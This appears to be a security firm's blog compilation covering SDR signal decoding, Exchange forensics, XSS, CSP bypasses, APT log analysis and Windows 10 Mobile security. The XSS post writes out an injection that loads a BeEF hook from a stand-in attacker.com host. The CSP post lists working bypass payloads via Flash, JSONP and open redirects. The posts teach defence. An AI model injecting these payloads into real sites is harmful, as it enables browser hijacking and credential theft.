Black Hat USA 2016 / DEF CON 24

At the beginning of August, as every year, two of our security analysts attended the most renowned IT security conferences Black Hat USA and DEF CON to learn about the latest trends and research. This year’s Black Hat conference, the 19th edition, took place at the Mandalay Bay Conference Center while DEF CON 24 was located in Paris and Bally’s in Las Vegas.

Welcome to Las Vegas

In the following, we are going to summarize a selection of the talks attended.

Continue reading

Software Defined Radio (SDR) and Decoding On-off Keying (OOK)

This post will give a quick intro into software defined radio (SDR) basics and provide guidance for the decoding of a very simple form of digital modulation (on-off keying).

Device Wireless Specs

Wireless junk hacking is not too difficult. Usually, devices transceive in the 433MHz or 868MHz ISM radio bands. As these bands are somewhat lax with licensing all devices operating in these bands must be capable of tolerating interferences of other band users. Pretty much comparable to the Internet 🙂 The European communications office (ECO) maintains a list of bands for European countries, including Switzerland. The list provides information allocated ranges and its specific purpose e.g. 5000MHz to 5030MHz is reserved to the GALILEO global navigation satellite system (GNSS) project.The US make it even simpler to get up to speed with any junk’s wireless configuration (frequency, modulation types and line coding). Every wireless device approved for the US market must carry an FCC ID. The online catalog provides access to the wireless specs of the devices based on its ID (usually printed on the device’s back or specification sticker).

Radio Observation

Alexandru Csete’s gqrx software defined radio comes in as a handy spectrum analyzer when looking for exact frequencies. It’s mainly based on the GNU radio project and supports all well-known platforms (Ettus USRPs, BladeRF, HackRF, RTL chipset et. al).

For the devices I have at hand (light switches, temperature and humidity sensors, car keys, M-Bus transmitters) it worked out they all operate in the 433MHz and 868MHz bands and can be easily observed with gqrx.

decoding_onoff_keying_gqrx

The spectrum analyzer (mouse tooltip) tells us that the specific light switch is operating at 433.93 MHz. An interestingly enough gqrx supports other fun and geek stuff such as listening to FM radio or eavesdrop on road work and building site radio conversations.

Signal Capturing

Well, signal capturing slightly varies depending on the device and library you use. The device I used for this tutorial is originally an DVB-T USB stick but comes with the relevant Realtek RTL2832 chipset and goes for a few bucks on most major reseller platforms. Check the supported hardware list at the gnuradio site. Hat tip to the Defcon Switzerland folks who provided me with one for cheap.

The following lines give an idea on how to capture signals with the Realtek chipset family of devices.

bla@bli:~$ rtl_sdr -f 433850000 -s 1000000 -g 20 switch.cu8
 Found 1 device(s):
 0:  Realtek, RTL2838UHIDIR, SN: 00000001

Using device 0: Generic RTL2832U OEM
 Found Rafael Micro R820T tuner
 Exact sample rate is: 1000000.026491 Hz
 [R82XX] PLL not locked!
 Sampling at 1000000 S/s.
 Tuned to 433850000 Hz.
 Tuner gain set to 19.70 dB.
 Reading samples in async mode...
 ^CSignal caught, exiting!

User cancel, exiting...

Make sure not to capture at the exact determined frequency of the device but rather slightly above or below as the internal synthesizer will otherwise interfere and overlay the signal. Note, that we chose to sample the signal at a rate of 1 million samples per second (1 Msps) and the output I/Q data was stored in the cu8 format. Some tools create outputs as complex signed int (.cs8, HackRF), others as complex unsignend int (.cu8, RTL) and GNU radio prefers complex float format (.cfile). There is a GNU Radio Companion (GRC) template and Paul Brewer’s rtlsdr-to-gqrx tool for conversion from .cu8 to .cfiles, should one need to pivot between the file types.

Alternatively one could use gqrx and record or replay signals in cfile format (Menu bar => Tools => I/Q recorder, CTRL-I). Note: Replay doesn’t transmit your signal but displays your capture within gqrx.

Signal Inspection

I used inspectrum to inspect my capture files. Once loaded, the capture coloring needs some tweaking but usually gives good hints on simple modulation, codings (e.g. Manchester) and the signal’s symbol rate.

decoding_onoff_keying_inspectrum_load

Usually, slight zoom and adjustment of power max an min sliders allows to easily discover the on-off keying modulation used in the example. Set the correct sample rate and drag the grid over the signal in order to determine the symbol rate of the signal.

decoding_onoff_keying_inspectrum_symbols

The symbol rate of the switch signal is 1631 Hz. Scrolling through the capture will also reveal that the on and off signal of the switch only differ in few locations, share the same bit heading and are being sent multiple times in a sequence. Pressing the button once obviously results in three or more transmissions of the on or off signal.

Signal Decoding

The GRC is the tool of choice for simple digital signal processing. It provides a building block GUI that allows for quick design of processing flows. The following design serves as a quick and dirty approach for OOK demodulation.

decoding_onoff_keying_grc

The relevant variables for the decoding are the sample rate (samp_rate: 1 Msps) and the symbol rate (baud_rate: 1631 Hz) which must be set to the values determined before.

The file source points to .cfile version of the previously captured signals and feeds data into a throttle block to avoid infinite processing speed. The “Complex to Mag^2” and “Threshold” blocks will convert the signal wave forms into a rectangular pulse of ones and zeros. Note, that the data type switched from complex (light blue) to float (orange) with the “Complex to Mag^2” block.

The “Keep 1 in N” block will assure the one bit is represented by a single data point. N is computed as samp_rate/baud_rate. Note, such rough way of signal processing may not work with signals that slightly vary the baud rate or with long lasting sequences. Even with short signals one must expect small errors. The scope sink then displays the decoded binary values.

decoding_onoff_keying_grc_scope_plot

Compare the scope plot to the previous inspectrum screenshot and you will notice that the demodulated signal actually compares with the figure in inspectrum.

Signal Analysis

GRC Visualization Support

None of the visual sinks in GRC provide easy means to visualize binary streams and adjustments to easily spot patterns and variations between streams. Thus, I decided to come up with a custom out-of-tree module for binary visualization and inspection, in short BinViz.

The initial GRC project requires small justifications to feed data into BinViz instead of the WX GUI Scope.

decoding_onoff_keying_grc_binviz

The “Float to Char” block will convert float values into 0x00 and 0x01. Moreover, the “Unpacked to Packed” block will squeeze eight chars into a single byte (e.g. 0x00 0x00 0x00 0x01 0x01 0x01 0x01 0x01 => 0x1F) and feed this into BinViz.

BinViz Configuration

Parameters start, end and drop patterns allow for justification of how streams are displayed and aligned. These parameters take strings composed of 0s and 1s e.g. 01010101 as a preamble or start pattern. The display will start on a new line for each occurrence of the start pattern. On detection of the end pattern the display will wrap to a new line. In case both, the start and end pattern are defined, the display will drop any out-of-bounds bits and only display streams from start to end on a single line each. Once the start pattern is being detected additional occurrences of the pattern will be ignored until the end is detected.

To get rid of long sequences of zero bytes or arbitrary unwanted bit sequences set “skip zero bytes” to true or define a string of 0s and 1s for the drop pattern to be removed. Note, the drop pattern and “skip zero bytes” have precedence over start and end detection patterns.

decoding_onoff_keying_binviz_example

The display itself allows for some semi-live adjustments and manual analysis. E.g. the mouse wheel on the display allows to zoom-in and zoom-out while new bits are being displayed instantly. Once the display is clicked it will stop painting new bits and display a cursor and its x/y-position. In that mode, one could easily count bits or select part of the bitstream for magnification and closer inspection.

Visual Signal Analysis

Earlier analysis using inspectrum lets us observe six occurrences of the on signal when switching on and further six occurrences of the off signal when switching off. For this type of wireless junk it is probably irrelevant how many times the receiver picks up the signal. As noted earlier it is rather a matter of resilience towards other ISM band users to send the signal multiple times. Just to make sure its being picked up, sooner or later.

decoding_onoff_keying_binviz_sequence

BinViz was configured “11010011” for the start and “1001001001001001001” for the end pattern. That way, only relevant data is displayed. Thanks to BinViz capabilities the six on and off signals are easily recognizable as single rows. Moreover, the the differences between the on and off signals is immediately clear.

Looking forward for you contributions https://github.com/CBrunsch/BinViz

Hands-on, IoT Security Training

If you need more hands-on with junk hacking or analysis of IoT devices then you are very welcome to join us for our brand new practise oriented training on “IoT Security” held in German at the Compass head office in Jona on September 20th/21st 2016. Sign-up here.

Exchange Forensics

Introduction

The number one form of communication in corporate environments is email. Alone in 2015, the number of business emails sent and received per day were estimated to be over 112 billion [1] and employees spend on average 13 hours per week in their email inbox [2]. Unfortunately, emails are at times also misused for illegitimate communication. Back in the days when the concept of email was designed, security was not the main focus of the inventors and some of the design short comings are still problematic today. The sender rarely uses encryption and the receiver cannot check the integrity of unprotected emails. Not even the metadata in the header of an email can be trusted as an attacker can easily forge this information. Even though many attempts have been made into securing email communication, there are still a lot of unsecured emails sent every day. This is one of the reasons why attackers still exploit weaknesses in email communication. In our experience, a lot of forensic investigations include an attacker either stealing/leaking information via email or an employee unintentionally opening Malware he received via email. Once this has happened, there is no way around a forensic investigation in order to answer key question such as who did what, when and how? Because many corporate environments use Microsoft Exchange as mailing system, we cover some basics on what kind of forensic artifacts the Microsoft Exchange environment provides.

Microsoft Exchange Architecture

In order to understand the different artifacts we first take a look at the basic Microsoft Exchange architecture and the involved components. The diagram below this paragraph shows the architectural concepts in the On-premises version of Exchange 2016. Edge Transport Servers build the perimeter of the email infrastructure. They handle external email flow as well as apply antispam and email flow rules. Database availability groups (DAGs) form the heart of Microsoft’s Exchange environment. They contain a group of Mailbox servers and host a set of databases. The Mailbox servers contain the transport services that are used to route emails. They also contain the client access service, which is responsible for routing or proxying connections to the corresponding backend services on a Mailbox server. Clients don’t connect directly to the backend services. When a client sends an email through the Microsoft Exchange infrastructure, it always traverses at least one Mailbox server.

architecture[3] (Exchange 2016 Architecture, Microsoft)

Compliance Features

Microsoft Exchange provides multiple compliance features. Each of those compliance features provides a different set of information to an investigator and it is important to have a basic understanding of their behavior in order to understand which feature can provide answer to which question. The most important compliance features are covered in the following paragraphs.

Message Tracking

The message tracking compliance feature writes a record of all activity as emails flow through Mailbox servers and Edge Transport servers into a log file. Those logs contain details regarding the sender, recipient, message subject, date and time. By default the message tracking logs are stored for a maximum of 30 days if the size of the log files does not grow bigger than 1000MB.

The following example shows the message tracking log entries created when the user “alice@csnc.ch” sends a message with the MessageSubject “Meeting” to the user “bob@csnc.ch“. Note that in this example both users have their mailboxes on the same server.

EventId    Source      Sender        Recipients    MessageSubject
-------    ------      ------        ----------    --------------
NOTIFYMAPI STOREDRIVER               {}
RECEIVE    STOREDRIVER alice@csnc.ch {bob@csnc.ch} Meeting
SUBMIT     STOREDRIVER alice@csnc.ch {bob@csnc.ch} Meeting
HAREDIRECT SMTP        alice@csnc.ch {bob@csnc.ch} Meeting
RECEIVE    SMTP        alice@csnc.ch {bob@csnc.ch} Meeting
AGENTINFO  AGENT       alice@csnc.ch {bob@csnc.ch} Meeting
SEND       SMTP        alice@csnc.ch {bob@csnc.ch} Meeting
DELIVER    STOREDRIVER alice@csnc.ch {bob@csnc.ch} Meeting

The message content is not stored as part of message tracking logs. By default, the subject line of an email message is stored in the tracking logs, however this can be disabled in the configuration settings. [4]

Single Item Recovery

Single Item Recovery is a compliance feature that essentially allows you to recover individual emails without having to restore them from a full database backup. If a user deletes an email in Outlook, it goes to the “Deleted Items” folder. When the user deletes this email from the “Deleted Items” folder, the email will be placed into the “Dumpster” (soft delete). The following screenshots show how the “Dumpster” can be accessed:

recover_deleted_items1[5] (Recover deleted items in Outlook, Microsoft)

When clicking on the “Recover Deleted Items” trash symbol, the “Dumpster” gets opened as shown on the following screenshot:

recover_deleted_items2

[5] (Recover deleted items in Outlook, Microsoft)

From the “Dumpster”, messages can either be recovered or purged completely (hard delete). They can still be recovered if a backup of the mailbox is available of course. When Single Item Recovery is enabled it means that emails remain recoverable for administrators, even if the mailbox owner deletes the messages from the inbox, empties the “Deleted Items” folder and then purges the content of the “Dumpster”. Single Item Recovery is not enabled by default and has to be enabled prior to the date of an investigation. In order to recover a message, the following information is needed [6]:

  • The source mailbox that needs to be searched.
  • The target mailbox into which the emails will be recovered.
  • Search criteria such as sender, recipient or keywords in the message.

With the information above, an email can be found using the Exchange Management Shell (EMS) as shown in the following example.

Search-Mailbox "Alice" -SearchQuery "from:Bob" -TargetMailbox "Investigation Search Mailbox" -TargetFolder "Alice Recovery" -LogLevel Full

In-Place Hold

In-Place Hold can be used to preserve mailbox items. If this compliance feature is enabled, an email will be kept, even if it was purged by a user (deleted from the “Dumpster” folder). Also if an item is modified, a copy of the original version is retained. The In-Place hold is usually activated during investigations in order to preserve the Mailbox content of an individual. The individual do not notice that they are “on hold”. A query with parameters can be used to granularly define the scope of items to hold. By default In-Place Hold is disabled and if neither Single Item Recover nor the In-Place Hold is enabled, an email will be permanently deleted if a user purges (deletes) it from the “Dumpster.

Mailbox Auditing

Mailboxes can contain sensitive information including personally identifiable information (PII). Therefore it is important that it gets tracked who logged on to a mailbox and which actions were taken. It is especially important to track access to mailboxes by users other than the mailbox owner, the so called delegates.

By default mailbox auditing is disabled and when enabled it requires more space on the corresponding mailbox. If enabled, one can specify which user actions (for example, accessing, moving, or deleting a message) are logged per logon type (administrator, delegate user, or owner). Audit log entries also include further important information such as the client IP address, host name, and processes or clients used to access the mailbox. If the auditing policy is configured to only include key records such as sending or deleting items there is no noticeable impact in terms of storage and performance.

Administrator Auditing

This compliance feature is used to log changes that an administrator makes to the Exchange Server configuration. By default, the log files are enabled and kept for 90 days. Changes to the administrator auditing configuration are always logged. The log files are stored in a hidden dedicated mailbox which cannot be opened in Outlook or OWA.

Others

Exchange email flow rules, also known as transport rules can be used to look for specific conditions in messages that pass through an Exchange Server. Those rules are similar to the Inbox rules, a lot of email client’s offer. The main difference between an email flow rule and a rule one would setup in an email client is that email flow rules take action on messages while they are in transit, as opposed to after the message is delivered. Further, email flow rules have a richer set of conditions, exceptions as well as actions, which provide the flexibility to implement many types of messaging policies. [7]

Journaling allows recording a copy of all email communications and sending it to a dedicated mailbox on an Exchange Server. Archiving on the other hand can be used to backup up data, removing it from its native environments and store a copy on another system. Finally there is always the option of a full backup of an Exchange database. This creates and stores a complete copy of the database file as well as transaction logs.

Summary

As we have seen, Microsoft Exchange provides various compliance features that help during forensic investigations involving email analysis. Having an understanding of which artifacts are available is key. The following table summarises the compliance features discussed in this post:

summary_table

Courses and Beer-Talk Reference

In order to directly share our experience in this field we choose “Exchange Forensics” as topic for our upcoming beer talks. Don’t hesitate to sign up if you are interested. For more information click on the link next to the location you would like to attend:

If you like to dive even deeper, we provide the Security Training: Forensic Investigations. It covers:

  • Introduction to forensic investigations
  • Chain of custody
  • Imaging
  • Basic of file systems
  • Traces in slack space
  • Traces in office documents
  • Analysis of windows systems
  • Analysis of network dumps
  • Analysis of OSX systems
  • Analysis of mobile devices
  • Forensic readiness
  • Log analysis

If you are interested please visit our “Security Trainings” section to get more information: https://www.compass-security.com/services/security-trainings/kursinhalte-forensik-investigation/ or get in touch if you have questions.

Sources and References:

[0] E-mail Forensics in a Corporate Exchange Environment, Nuno Mota, http://www.msexchange.org/articles-tutorials/exchange-server-2013/compliance-policies-archiving/e-mail-forensics-corporate-exchange-environment-part1.html

[1] Email-Statistics-Report-2015-2019, The Radicati Group, Inc., http://www.radicati.com/wp/wp-content/uploads/2015/02/Email-Statistics-Report-2015-2019-Executive-Summary.pdf

[2] the-social-economy, McKinsey & Company, http://www.mckinsey.com/industries/high-tech/our-insights/the-social-economy

[3] Exchange 2016 Architecture, Microsoft, https://technet.microsoft.com/de-ch/library/jj150491(v=exchg.160).aspx

[4]  Message Tracking, Microsoft, https://technet.microsoft.com/en-us/library/bb124375(v=exchg.160).aspx

[5] Recover deleted items in Outlook, Microsoft, https://support.office.com/en-us/article/Recover-deleted-items-in-Outlook-2010-cd9dfe12-8e8c-4a21-bbbf-4bd103a3f1fe

[6] Recover deleted messages in a user’s mailbox, Microsoft, https://technet.microsoft.com/en-us/library/ff660637(v=exchg.160).aspx

[7] Mail flow or transport rules Microsoft, https://technet.microsoft.com/en-us/library/jj919238(v=exchg.150).aspx

Cross-Site Scripting

Cross-Site Scripting is harmless? Think again!

Cross-Site Scripting, oftentimes referred to as “XSS”, is a common vulnerability of web applications. This vulnerability refers to the incorrect behavior of a web application to insufficiently encode user provided data when displaying it back to the user. If this is the case, attackers are able to inject malicious code, for instance JavaScript, into the affected website.

xssOne of our main tasks at Compass Security is testing web applications for security issues. Thus, we can safely say that many current web applications are affected by this type of vulnerability, even though protecting against it is simple. For simplicity reasons, XSS is usually depicted as a popup window displaying simple text.

Such a popup would be induced by the following code:

<script>alert(0)</script>

The entire attack would look as follows, given that the parameter param is vulnerable. Assume that the following code is used by a web application without employing output encoding:

<input type="text" name="param" value="user_input">

Here, user_input is the non-output encoded data provided by the user.

Then, an attacker can exploit this by setting param to

“><script>alert(0)</script><!–

which will lead to the following being sent to the user:

<input type=”text” name=”param” value=”“><script>alert(0)</script><!–“>

resulting in the above popup being displayed.

When discussing XSS with customers, one of the more common statements we hear is: “this issue is harmless; it only displays text in a popup window”. This is not true, however, since XSS is far more powerful than often suspected. It allows an attacker to take full control over the victim’s browser. The victim, in this case, is the user who visits the attacked website. Common attack vectors include the victim’s session cookie being stolen, if it is not protected by the so-called HttpOnly flag. Further, the affected website can be manipulated so that the user is redirected to a Phishing website, allowing the attacker to obtain the user’s credentials. Finally, if the victim’s browser is outdated and contains known vulnerabilities, these can directly be exploited via Cross-Site Scripting and, if successful, lead to the victim’s computer being compromised.

beefMany of the above-mentioned attack vectors can be very easily tested using the BeEF (Browser Exploitation Framework) Framework (http://beefproject.com/). This framework provides many attack vectors that can be used by including just one malicious JavaScript file into the vulnerable website. Hence, instead of the above code (“><script>alert(0)</script><!–), the following would be injected:

“><script src=http://attacker.com/hook.js></script><!–

where attacker.com is an attacker-controlled website and hook.js is the malicious JavaScript file that will allow the BeEF server on the attacker’s machine to take control over the victim’s browser.

Once the victim’s browser executes the injected JavaScript, it is “hooked”, that is, in the attacker’s control, allowing them to obtain all kinds of information such as the user’s cookies, browser type and version, etc.:

beef_hook

Among many different types of attack vectors, BeEF allows, e.g., displaying a password prompt to the user (in the user’s browser):

beef_password_alertOnce the user entered their password, it is sent to the attacker:

beef_password_resultHow to protect against such attacks?

Simple! Just encode user-provided data before echoing it back to the user. An effective method is to use HTML entities:
is encoded as &quot;,
< is encoded as &lt;,
and so forth (for a detailed explanation, refer to https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).

If you want to see this any many more typical web application vulnerabilities, try them out yourself, and learn how to defend against them, register for our next Web Application Security course:

https://www.compass-security.com/services/security-trainings/

The Web Application Security (Basic/Advanced) courses will introduce all major web application attack vectors via theory and hands-on challenges in our Hacking-Lab:

https://www.hacking-lab.com/

Content-Security-Policy: misconfigurations and bypasses

Introduction

The Content Security Policy (CSP) is a security mechanism web applications can use to reduce the risk of attacks based on XSS, code injection or clickjacking. Using different directives it is possible to lock down web applications by implementing a whitelist of trusted sources from which web resources like JavaScript may be loaded. Currently the CSP version 2 is supported by Firefox, Google Chrome, and Opera, whereas other browsers provide limited support or no support at all (Internet Explorer)[4].

The CSP has two modes of operation [7]: enforcing and report-only. The first one can be used to block and report attacks whereas the second one is used only to report abuses to a specific reporting server. In this blog post, we will focus only on the enforcing mode.

The policy, in order to work, has to be included in each HTTP response as a header (“Content-Security-Policy:”). The browser will then parse the CSP and check if every object loaded in the page adheres to the given policy. To specify these rules, the CSP provides different directives [5]:

  • script-src: defines valid sources of JavaScript
  • object-src: defines valid sources of plugins, like <objects>
  • img-src: defines valid sources of images
  • style-src: defines valid source of stylesheets
  • report-uri: the browser will POST a report to this URI in case of policy violation

Each of these directives must have a value assigned, which is usually a list of websites allowed to load resources from. The default behavior of directives if omitted, is to allow everything (“*”) without restrictions [9]. A basic example of a valid CSP is shown below:

Content-Security-Policy: default-src 'self'; script-src compass-security.com

The directive “default-src” is set to ‘self’, which means same origin. All resources without a directive set are allowed to be loaded only from the same origin, in this case “blog.compass-security.com”. Setting the “default-src” directive can be a good start to deploy your CSP as it provides a basic level of protection. “script-src” is used to allow all JavaScripts to be loaded from the domain “compass-security.com”, via HTTP (https:// should be explicitly specified) without allowing subdomains. These could be specified directly (e.g. sub.compass-security.com) or using the “*” wildcard (*.compass-security.com)

Misconfigurations and Bypasses

Even though it is possible to have a good level of control over the policy, errors in the definition of directives may lead to unexpected consequences. Misconfiguration or ambiguities can render the policy less efficient or easy to bypass. In addition, the functionality of the application could also be broken. The following example illustrates what can happen if “default-src” is omitted:

Content-Security-Policy: script-src compass-security.com

Now, all the scripts with source “compass-security.com” are allowed. But what about the other objects like stylesheets or flash applets? The policy above can be bypassed for example using this payload, which triggers an alert box using a Flash object[7]:

">'><object type="application/x-shockwave-flash" 
data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/
assets/charts.swf?allowedDomain=\"})))}catch(e{alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>

One other common mistake is the inclusion of the dangerous “unsafe-inline” or “unsafe-eval” directives. These allow the execution of potentially malicious JavaScript directly via “<script>” tags or eval():

Content-Security-Policy: default-src 'self'; script-src compass-security.com 'unsafe-inline';

This policy defines the default source as “self” and allows the execution of script from “compass-security.com” but, at the same time, it allows the execution of inline scripts. This means that the policy can be bypassed with the following payload [7]:

">'><script>alert(1337)</script>

The browser will then parse the JavaScript and execute the injected malicious content.

Besides these trivial misconfigurations shown above, there are some other tricks used to bypass CSP that are less common and known. These make use, for example, of JSONP (JSON with padding) or open redirects. Let’s take a look at JSONP bypasses.

If the CSP defines a whitelisted JSONP endpoint, it is possible to take advantage of the callback parameter to bypass the CSP. Assuming that the policy is defined as follows:

Content-Security-Policy: script-src 'self' https://compass-security.com;

The domain compass-security.com hosts a JSONP endpoint, which can be called with the following URL:

https://compass-security.com/jsonp?callback={functionName}

Now, what happens if the {functionName} parameter contains a valid JavaScript code which could be potentially executed? The following payload represents a valid bypass [7]:

">'><script src="https://compass-security.com/jsonp?callback=alert(1);u">

The JSONP endpoint will then parse the callback parameter, generating the following response:

Alert(1); u({……})

The JavaScript before the semicolon, alert(1), will be executed by the client when processing the response received.

URLs with open redirects could also pose problems if whitelisted in the CSP. Imagine if the policy is set to be very restrictive, allowing only one specific file and domain in its “script-src” directive:

Content-Security-Policy: default-src: 'self'; script-src https://compass-security.com/myfile.js https://redirect.compass-security.com

At first sight, this policy seems to be very restrictive: only the myfile.js can be loaded along with all the scripts originating from “redirect.compass-security.com” which is a site we trust. However, redirect.compass-security.com performs open redirects through a parameter in the URL. This could be a possible option to bypass the policy [7]:

">'><script src="https://redirect.compass-security.com/redirect?url=https%3A//evilwebsite.com/jsonp%2Fcallback%3Dalert">

Why is it possible to bypass the CSP using this payload? The CSP does not check the landing page after a redirect occurs and, as the source of the script tag “https://redirect.compass-security.com” is whitelisted, no policy violation will be triggered.

These are only a small subset of possible CSP bypasses. If you are interested, many of them can be found at [6] or [7].

The “nonce” directive

Besides the whitelist mechanism using URLs, in the CSP2 there are other techniques that can be used to block code injection attacks. One of these is represented for example by “nonces”.

Nonces are randomly generated numbers that should be defined in the CSP and included only inside <script> or <style> tags to identify resources and provide a mapping between the policy and the client’s browser. An attacker injecting a payload containing a script tag has no knowledge of the nonce previously exchanged between the client and the server, resulting in the CSP detecting this and throwing a policy violation. A possible configuration of a CSP with nonces could be:

Content-Security-Policy: script-src 'nonce-eED8tYJI79FHlBgg12'

The value of the nonce (which should be random, unpredictable, generated with every response, and at least 128 bits long [10]) is “eED8tYJI79FHlBgg12”.

This value should be then passed to each script tag included in our application’s pages:

<script src="http://source/script.js" nonce="eED8tYJI79FHlBgg12">

The browser will then parse the CSP, check if the scripts included have a matching value and block those that do not include any valid nonce. This technique works great against stored XSS, as the attacker cannot include valid nonces at injection time. Another advantage is that there is no need to maintain whitelists of allowed URLs, as the nonce acts as an access token for the <script> tag and not necessarily for the source of the script. It is also possible to use hashes in order to identify the content of each <script> element inside the page, more information about this feature can be found at [8].

Conclusion

We have seen that the CSP is a very useful tool web developers can use to have better control on the loaded resources. The different directives provide flexibility to allow or deny potentially dangerous web resources inside web pages. However, it is also easy to make errors if too many URLs are whitelisted (e.g. hidden JSONP endpoints). Here at Compass we encourage the use of the CSP as an additional barrier against web threats. Nonetheless, I would like to stress that the first protection against code injection should always be provided by a solid input/output validation, which can help also against other common attacks like SQL injections.

If you would like to get more information about how web applications should be protected, or you want to deepen your web security knowledge we provide different trainings:

We are also offering trainings in other areas of IT Security. You can check the different topics here:

Sources & References

  1. https://www.owasp.org/index.php/Content_Security_Policy
  2. https://www.w3.org/TR/CSP2/#intro
  3. https://w3c.github.io/webappsec-csp/#match-element-to-source-list
  4. http://caniuse.com/#search=Content%20Security%20Policy%20Level%202
  5. http://content-security-policy.com/
  6. https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it’s-CSP!%22.
  7. http://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf
  8. https://blog.mozilla.org/security/2014/10/04/csp-for-the-web-we-have/
  9. http://www.html5rocks.com/en/tutorials/security/content-security-policy/
  10. https://www.w3.org/TR/CSP/#source_list

APT Detection & Network Analysis

Until recently, the majority of organizations believed that they do not have to worry about targeted attacks, because they consider themselves to be “flying under the radar”. The common belief has been: “We are too small, only big organizations like financial service providers, military industry, energy suppliers and government institutions are affected”.

However, this assumption has been proven wrong since at least the detection of Operation ShadyRAT[0], DarkHotel[1] or the recent “RUAG Cyber Espionage Case”[2]. The analysis of the Command & Control (C&C) servers of ShadyRAT revealed that a large-scale operation was run from 2006 to 2011. During this operation 71 organizations (private and public) were targeted and spied on. It is assumed that these so-called Advanced Persistent Threats (APT) will even increase in the near future.

We at Compass Security are often asked to help finding malicious actions or traffic inside corporate networks.

The infection, in most cases, is a mix of social engineering methods (for example spear phishing) and the exploitation of vulnerabilities. This actually varies from case to case. Often we observe in proxy logs, that employees were lured into visiting some phishing sites which are designed to look exactly like the corporation’s Outlook Web Access (OWA) or similar applications/services as being used by the targeted company.

Typically, this is not something you can prevent exclusively with technical measures – user awareness is the key here! Nevertheless, we are often called to investigate when there still is some malware activity in the network. APT traffic detection can then be achieved with the correlation of DNS, mail, proxy, and firewall logs.

Network Analysis & APT Detection

To analyze a network, Compass Analysts first have to know the network’s topology to get an idea of how malware (or a human attacker) might communicate with external servers. Almost every attacker is going to exfiltrate data at some point in time. This is the nature of corporate/industrial espionage. Further, it is important to find out whether the attacker gained access to other clients or servers in the network.

For the analysis, log files are crucial. Many companies are already collecting logs on central servers [3], which speeds up the investigation process, since administrators don’t have to collect the logs from many different sources (which sometimes takes weeks), and off-site logs are more difficult to clear by attackers.

To analyze logs and sometimes traffic dumps, we use different tools like:

ELK offers many advantages when it comes to clustering and configuration, but it doesn’t offer many pre-configured log parser rules. If you are lucky, you can find some for your infrastructure on GrokBase[4]. Otherwise there are plenty of tools helping you to build them on your own, such as e.g. Grok Debugger[5].

However, when analysis has to be kick-started fast, and you do not have time to configure large rulesets – Splunk comes with a wide range of pre-configured parsers.

After we gathered all logs (and in some cases traffic dumps), we feed them into Splunk/ELK/Moloch for indexing.

In a first step we try to clean the data set by removing noise. To achieve this, we identify known good traffic patterns and exclude them. Of course it is not always straight forward to distinguish between normal and suspicious traffic as some malware uses for example Google Docs for exfiltration. It takes some time to understand what the usual traffic in a network looks like. To clean the data set even more, we then look for connections to known malware domains.

There are plenty of lists available for this:

If we are lucky, the attacker used infrastructure provided by known malware service providers (individuals and organizations are selling special services just for the purpose of hosting malware infrastructure). But more sophisticated attacks will most likely use their own infrastructure.

After cleaning out the data sets, we look for anomalies in the logs (e.g. large amounts of requests, single requests, big DNS queries, etc.). Some malware is really noisy and as a consequence, easy to find. Some samples are connecting to their C&C servers in a high frequency. Other samples are requesting commands form C&C servers at regular time intervals (Friday 20:00 for example). Others connect just once.

Sometimes we also detect anomalies in the network infrastructure which are caused by employees, for example heavy usage of cloud services such as Google Drive or Dropbox. Often these constitute to so-called false positives.

To share our experiences and knowledge in this field, we created the Security Training: Network Analysis & APT.

This training will cover:

  • Configuration of evidence (What logs are needed?)
  • Static and Dynamic Log Analysis with Splunk
    • Splunk Basics and Advanced Usage
    • Detecting anomalies
    • Detecting malicious traffic
  • Attack & Detection Challenges

If you are interested please visit our “Security Trainings” section to get more information: https://www.compass-security.com/services/security-trainings/kursinhalte-network-anlysis-apt/ or get in touch if you have questions.

The next upcoming training is on 22. and 23. September 2016 in Jona, click here to register.

Sources & References:
[0] Operation Shady RAT, McAfee, http://www.mcafee.com/us/resources/white-papers/wp-operation-shady-rat.pdf
[1] The Darkhotel APT, Kaspersky Lab Research, https://securelist.com/blog/research/66779/the-darkhotel-apt/
[2] Technical Report about the Malware used in the Cyberespionage against RUAG, MELANI/GovCERT, https://www.melani.admin.ch/melani/en/home/dokumentation/reports/technical-reports/technical-report_apt_case_ruag.html
[3] “Challenges in Log-Management”, Compass Security Blog, http://blog.csnc.ch/2014/10/challenges-in-log-management/
[4] GrokBase, http://grokbase.com/
[5] Grok Debugger, https://grokdebug.herokuapp.com/
[x.0] APT Network Analysis with Splunk, Compass Security, Lukas Reschke, https://www.compass-security.com/fileadmin/Datein/Research/White_Papers/apt_network_analysis_w_splunk_whitepaper.pdf
[x.1] Whitepaper: Using Splunk To Detect DNS Tunneling, Steve Jaworski, https://www.sans.org/reading-room/whitepapers/malicious/splunk-detect-dns-tunneling-37022

Windows Phone – Security State of the Art?

Compass Security recently presented its Windows Phone and Windows 10 Mobile research at the April 2016 Security Interest Group Switzerland (SIGS) event in Zurich.

The short presentation highlights the attempts made by our Security Analysts to bypass the security controls provided by the platform and further explains why bypassing them is not a trivial undertaking.

Windows 10 Mobile, which has just been publicly released on 17th March 2016, has further tightened its hardware-based security defenses, introducing multiple layers of protection starting already at boot time of the platform. Minimum hardware requirements therefore include the requirement for UEFI Secure Boot support and a Trusted Platform Module (TPM) conforming to the 2.0 specification. When connected to a MDM solution the device can use the TPM for the new health attestation service to provide conditional access to the company network, its resources and to trigger corrective measures when required.

Compared to earlier Windows Phone versions, Windows 10 Mobile finally allows end-users without access to an MDM solution or ActiveSync support to enable full disk encryption based on Microsoft BitLocker technology. Companies using an MDM solution also have fine grained control over the used encryption method and cipher strength. Similar control can be applied to TLS cipher suites and algorithms.

Newly introduced features also include the biometric authentication using Windows Hello (selected premium devices only for the moment) or the Enterprise Data Protection (EDP) which helps separating personal and enterprise data and serves as a data loss protection solution. EDP requires the Windows 10 Mobile Enterprise edition and is currently available to a restricted audience for testing purposes.

Similar to Windows 10 for workstations the Mobile edition automatically updates. Users of the Windows 10 Mobile Enterprise edition however have the option to postpone the downloading and installation of updates.

